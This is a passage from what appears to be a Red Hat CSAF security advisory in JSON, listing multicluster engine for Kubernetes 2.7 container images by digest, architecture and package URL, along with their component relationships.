"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Aa99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773185866"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091077"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091070"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773741020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3A66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773091099"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3A2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970964"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3Ad2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3A86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1773970968"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64 as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x as a component of multicluster engine for Kubernetes 2.7",
"product_id": "multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x"
},
